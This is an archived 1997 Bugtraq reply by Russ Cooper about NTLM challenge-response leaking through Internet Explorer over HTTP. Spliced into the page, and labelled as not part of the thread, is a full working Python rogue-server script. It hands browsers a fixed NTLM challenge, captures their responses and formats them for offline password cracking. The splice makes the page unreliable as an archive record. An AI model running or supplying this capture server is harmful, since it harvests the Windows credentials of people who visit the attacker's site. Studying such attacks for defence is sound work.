Bugtraq mailing list archives
Re: NT4.0 SP3 Still vulnerable
From: Russ.Cooper () RC ON CA (Russ)
Date: Fri, 16 May 1997 14:07:25 -0400
> As far as I know, IE 3.02 corrected only sending NTLM logins through HTTP connections, and I suppose you are talking about capturing username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).

This information is incorrect. IE 3.02 does not prevent NTLM negotiations from taking place via HTTP to any server which requests NTLM authentication.

> I'm still downloading SP3, but after a look at the readme it looked to me that SP3 could empower an administrator to fix such a bug by enabling the SMB signing feature; it would not fix it at installation.

SMB signing does not alter NTLM negotiations; it modifies SMB sessions.

> And with or without SP3, filtering routers blocking ports 135/137/138/139 make this exploit and similar ones limited to intranets.

This information is incorrect. As long as IE is willing to negotiate an authenticated connection to an HTTP server using NTLM, blocking the ports you mention will have no effect. It's still possible to retrieve the information via the HTTP channel. Granted, with the above ports closed it may not be possible to use this information to exploit a system through your routers, but this doesn't alter the fact that the information may become known and exploited internally.

> Hasn't exploit code been released to SAMBA-DIGEST? It captures the password hashes, which someone could pass to l0phtcrack and similar crackers.

I think Aaron was likely referring to the code required on a non-NT web server to get a browser to send an NTLM challenge response to a pre-defined challenge, capture it, parse it to obtain the plain-text equivalent which could then be input into some cracking program.

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security
owner of the NTBugTraq mailing list: http://ntbugtraq.rc.on.ca/index.html
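The server side of the exchange Russ describes, written out as an added example that is not part of this thread and not anyone's posted code: a Python sketch of how a non-NT web server demands NTLM, answers the browser's Type 1 message with a pre-defined challenge instead of a random one, and parses the Type 3 reply into a line a cracker can consume. It also makes Russ's earlier point concrete: every step rides on HTTP Authorization / WWW-Authenticate headers, so no SMB port is ever touched. All names, the fixed challenge value, the target name and the user/domain/workstation strings are assumptions; the two 24-byte responses in the sample are constructed placeholder bytes, not computed from a real password; the byte layouts follow the NTLMSSP Type 1/2/3 message formats, and the output line uses the user::domain:LM:NT:challenge NetNTLMv1 layout that later crackers accept, not l0phtcrack's own input format.

```python
import base64
import struct

NTLMSSP = b"NTLMSSP\x00"
FLAGS = 0x00000001 | 0x00000200   # NEGOTIATE_UNICODE (UTF-16LE strings) | NEGOTIATE_NTLM
# The rogue server never picks a random challenge: it always sends this one (arbitrary
# assumed value), so every captured response is against a challenge the attacker knows.
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")

def _secbuf(length, offset):
    """NTLM 'security buffer': uint16 length, uint16 max length, uint32 offset."""
    return struct.pack("<HHI", length, length, offset)

def _read_secbuf(msg, at):
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
    return msg[offset:offset + length]

def build_type2(challenge=FIXED_CHALLENGE, target="WEB"):
    """Server CHALLENGE_MESSAGE; the challenge sits at bytes 24..31."""
    target_u = target.encode("utf-16-le")
    hdr = 48  # sig 8, type 4, target secbuf 8, flags 4, challenge 8, reserved 8, target-info secbuf 8
    return (NTLMSSP + struct.pack("<I", 2) + _secbuf(len(target_u), hdr) + struct.pack("<I", FLAGS)
            + challenge + b"\x00" * 8 + _secbuf(0, hdr + len(target_u)) + target_u)

def build_type3(user, domain, workstation, lm_resp, nt_resp):
    """Client AUTHENTICATE_MESSAGE; used here only to construct the sample capture."""
    fields = [lm_resp, nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"),
              workstation.encode("utf-16-le"), b""]   # b"" = empty session key buffer
    hdr, bufs, payload = 64, b"", b""                  # sig 8, type 4, six secbufs 48, flags 4
    for f in fields:
        bufs += _secbuf(len(f), hdr + len(payload))
        payload += f
    return NTLMSSP + struct.pack("<I", 3) + bufs + struct.pack("<I", FLAGS) + payload

def parse_type3(msg):
    """Extract the LM and NT responses and the identity strings from a Type 3 message."""
    if not msg.startswith(NTLMSSP) or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM type 3 message")
    enc = "utf-16-le" if struct.unpack_from("<I", msg, 60)[0] & 1 else "latin-1"
    return {"lm": _read_secbuf(msg, 12).hex(), "nt": _read_secbuf(msg, 20).hex(),
            "domain": _read_secbuf(msg, 28).decode(enc), "user": _read_secbuf(msg, 36).decode(enc),
            "workstation": _read_secbuf(msg, 44).decode(enc)}

def handle_request(headers, challenge=FIXED_CHALLENGE):
    """One HTTP request as seen by the rogue server -> (status, response headers, capture).
    Nothing here touches an SMB port: the negotiation rides entirely on HTTP headers."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("NTLM "):
        return 401, {"WWW-Authenticate": "NTLM"}, None          # step 1: demand NTLM
    msg = base64.b64decode(auth[5:])
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == 1:                                             # step 2: reply with our challenge
        t2 = base64.b64encode(build_type2(challenge)).decode()
        return 401, {"WWW-Authenticate": "NTLM " + t2}, None
    if mtype == 3:                                             # step 3: keep what the browser sent
        cred = parse_type3(msg)
        cred["challenge"] = challenge.hex()
        return 200, {}, cred
    raise ValueError("unexpected NTLM message type %d" % mtype)

def to_cracker_line(cred):
    """user::domain:LMresp:NTresp:challenge, the NetNTLMv1 line layout later crackers accept."""
    return "%s::%s:%s:%s:%s" % (cred["user"], cred["domain"], cred["lm"], cred["nt"], cred["challenge"])

def run_exchange():
    """Drive the three requests with a constructed client; returns (capture, cracker line)."""
    # Constructed 24-byte responses, NOT computed from a real password (that needs MD4 + DES).
    lm_resp, nt_resp = bytes(range(0x10, 0x28)), bytes(range(0x40, 0x58))
    status, hdrs, _ = handle_request({})
    assert (status, hdrs["WWW-Authenticate"]) == (401, "NTLM")
    t1 = NTLMSSP + struct.pack("<II", 1, FLAGS) + _secbuf(0, 32) * 2     # minimal NEGOTIATE_MESSAGE
    status, hdrs, _ = handle_request({"Authorization": "NTLM " + base64.b64encode(t1).decode()})
    t2 = base64.b64decode(hdrs["WWW-Authenticate"][5:])
    assert status == 401 and t2[24:32] == FIXED_CHALLENGE      # the browser encrypts this value
    t3 = build_type3("alice", "CORP", "WS1", lm_resp, nt_resp)
    status, _, cred = handle_request({"Authorization": "NTLM " + base64.b64encode(t3).decode()})
    assert status == 200
    return cred, to_cracker_line(cred)

if __name__ == "__main__":
    print(run_exchange()[1])
```

Because the challenge is fixed, the attacker does not need to record anything per victim beyond the Type 3 message: the same known challenge is appended to every captured line, which is exactly what lets a dictionary cracker work on the responses offline.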
Current thread:
- Re: NT4.0 SP3 Still vulnerable Rubens Kuhl Jr. (May 15)
- <Possible follow-ups>
- Re: NT4.0 SP3 Still vulnerable Aaron Spangler (May 16)
- Re: NT4.0 SP3 Still vulnerable Russ (May 16)
- Re: NT4.0 SP3 Still vulnerable Aaron Spangler (May 16)